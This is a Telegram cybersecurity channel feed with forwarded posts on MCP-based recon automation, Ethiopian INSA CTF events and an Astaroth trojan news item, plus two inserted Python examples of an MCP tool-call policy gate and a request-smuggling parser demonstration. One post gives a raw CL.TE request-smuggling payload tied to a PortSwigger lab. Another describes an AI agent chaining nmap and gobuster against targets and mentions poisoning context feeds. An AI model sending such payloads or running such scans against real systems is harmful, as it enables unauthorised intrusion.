Forwarded from Mira
umm... yap
If you take hacking as a profession, experimenting with MCP is one of the cooler things you can do right now. it gives you a structured, protocol-driven way to expose tools (nmap, Burp, gobuster, even your scripts) as providers an LLM can call in sequence. basically it turns a model into an orchestrator that can handle recon workflows end-to-end without you manually chaining pipes. lemme give you this simple scenario: the agent runs nmap on a target. it parses the ports. decides to run gobuster on the exposed web service. maybe passes results to your own recon script. and finally presents you a nice little summary instead of 9000 lines of stdout. because MCP enforces standardized interfaces, you can sandbox providers, log and audit tool calls, and even apply policy/guardrails at the protocol layer, which is huge for both red-teamers (think pivoting across networked MCP providers or poisoning context feeds) and blue-teamers (detecting malicious providers or restricting unsafe tool use). it's even plausible in places where the ecosystem’s still rough and docs are obscure. you can start local with OSS GPTs to prototype, then move to the cloud when you need scale or shared workflows and integrations with CI/CD or SOC pipelines. maybe a hot take, but i feel like in a few years manually juggling pentest tools might feel irrelevant given the fast dynamics in the field.
#meyapping
⚡5👍3💯3
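The "log and audit tool calls" and "policy/guardrails at the protocol layer" idea from the post above, as an added example that is not part of the forwarded post: a gate that sits between the model client and a provider and inspects each JSON-RPC `tools/call` message. The tool names, the `target` argument key, the lab range and the error code are assumptions chosen for illustration.

```python
import ipaddress
import json

# Assumed policy (hypothetical tool names, argument key and lab range).
ALLOWED_TOOLS = {"nmap_scan", "gobuster_dir"}
IN_SCOPE = [ipaddress.ip_network("10.10.0.0/24")]
AUDIT_LOG = []  # one record per tools/call decision


def in_scope(target):
    """True only for literal IPs inside an authorised range."""
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        return False  # hostnames are denied rather than resolved
    return any(addr in net for net in IN_SCOPE)


def gate(raw):
    """Inspect one client->provider message; return (forward, reply)."""
    msg = json.loads(raw)
    if msg.get("method") != "tools/call":
        return True, None  # initialize, tools/list, ... pass through
    params = msg.get("params", {})
    tool = params.get("name")
    target = str(params.get("arguments", {}).get("target", ""))
    if tool not in ALLOWED_TOOLS:
        reason = "tool not allow-listed"
    elif not in_scope(target):
        reason = "target out of scope"
    else:
        reason = None
    AUDIT_LOG.append({"id": msg.get("id"), "tool": tool,
                      "target": target, "allowed": reason is None,
                      "reason": reason})
    if reason is None:
        return True, None
    # Denied: answer with a JSON-RPC error instead of forwarding the call.
    return False, {"jsonrpc": "2.0", "id": msg.get("id"),
                   "error": {"code": -32000, "message": reason}}


# Constructed sample traffic: one in-scope call, one out-of-scope, one unknown tool.
CALLS = [json.dumps({"jsonrpc": "2.0", "id": i, "method": "tools/call",
                     "params": {"name": n, "arguments": {"target": t}}})
         for i, (n, t) in enumerate([("nmap_scan", "10.10.0.5"),
                                     ("nmap_scan", "8.8.8.8"),
                                     ("run_shell", "10.10.0.5")], start=1)]
DECISIONS = [gate(c)[0] for c in CALLS]
```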
perplexity ai is giving one month free pro usage for students
go and grab this opportunity :))
https://www.perplexity.ai/students
@AfroSec
⚡5🔥2👏1
Forwarded from Tilet solution (Nebyat B Δ)
You don’t have to shine all the time. The moon rests too.
🔥6❤3
Forwarded from INSA Cyber Talent Center
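Call for CTF Competition!
Information Network Security Administration (INSA)
A Capture The Flag (CTF) competition organized on the occasion of the 6th National Cybersecurity Month!!
A platform where you can test your cybersecurity skills and compete with other professionals in the field!!
Compete! Win prizes!
To register: scan the QR code below
Venue: Information Network Security Administration (INSA), in person
Date: Tikimt 1, 2018 E.C.
From 2:30 in the morning, in person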
⚡3👍2🔥1
Forwarded from Brut Security
How to manually check for CL.TE Request Smuggling Vulnerabilities:
1️⃣ See if a GET request accepts POST
2️⃣ See if it accepts HTTP/1
3️⃣ Disable "Update Content-Length"
4️⃣ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked

0

G
5️⃣ Send request twice.
If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!
Try this out for yourself in our CL.TE lab: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
❤1
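Why the request in the post above comes back as "GPOST", as an added example that is not part of the forwarded post: two simplified parsers read the same bytes, one framing by Content-Length (front end) and one by chunked encoding (back end), alongside the check a server can apply to reject such ambiguous framing. The parsers are illustrative models, and the host `example.test` is a placeholder.

```python
# Constructed sample: the post's request, sent twice on one connection (placeholder host).
REQ = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
       b"Content-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n"
       b"0\r\n\r\nG")
STREAM = REQ + REQ


def split_head(buf):
    """Return (request line, lowercased header dict, remaining bytes)."""
    head, _, rest = buf.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    hdrs = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        hdrs[name.strip().lower()] = value.strip().lower()
    return lines[0], hdrs, rest


def has_ambiguous_framing(hdrs):
    """Both framing headers present: reject (400) instead of picking one."""
    return b"content-length" in hdrs and b"transfer-encoding" in hdrs


def frontend_requests(buf):
    """Front end: frames each body by Content-Length only."""
    out = []
    while b"\r\n\r\n" in buf:
        line, hdrs, rest = split_head(buf)
        n = int(hdrs.get(b"content-length", b"0"))
        out.append((line, rest[:n]))
        buf = rest[n:]
    return out


def backend_request_lines(buf):
    """Back end: frames each body by chunked encoding only."""
    out = []
    while b"\r\n\r\n" in buf:
        line, hdrs, rest = split_head(buf)
        out.append(line)
        if hdrs.get(b"transfer-encoding") == b"chunked":
            while True:  # consume chunks up to the terminating 0-size chunk
                size, _, rest = rest.partition(b"\r\n")
                n = int(size.split(b";")[0], 16)
                rest = rest[n + 2:] if n else rest[2:]
                if n == 0:
                    break
        buf = rest  # bytes after the last chunk start the "next request"
    return out
```

The front end sees two identical POSTs with a 6-byte body each; the back end stops at the zero-size chunk, so the trailing `G` is left in its buffer and prefixes the second request line.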
Forwarded from Yekolo Temari (የቆሎ ተማሪ)
🎉 The 6th National Cybersecurity Month CTF Has Concluded! 🎉
For those of you who couldn’t make the cut or weren’t able to attend the #CTF in person, good news!
We’ve now made the #CTF publicly accessible for everyone to explore and take on the challenges.
🔗 Click here to register and get started!
Test your skills, learn from real-world scenarios, and see how far you can go.
P.S. The #CTF will be live until tomorrow evening
Let’s see what you’ve got! 💪💻
#CybersecurityMonth #CTF #yekolotemari
Simulations labs
Cybersecurity Month CTF #2
The CTF will be a Jeopardy Style CTF where every team will have a list of challenges in different categories like Reverse Engineering, Web Security, Digital Forensics, Network Security and others. For every challenge solved, the team will get a certain amount…
⚡1👍1
Forwarded from The Hacker News
Hackers just turned GitHub into their command center.
When police take down their servers, the malware just… reboots itself from GitHub.
The twist? It hides configs inside images using steganography. This isn’t a glitch — it’s resilience by design.
Read how it works → https://thehackernews.com/2025/10/astaroth-banking-trojan-abuses-github.html
🔥4😱3❤1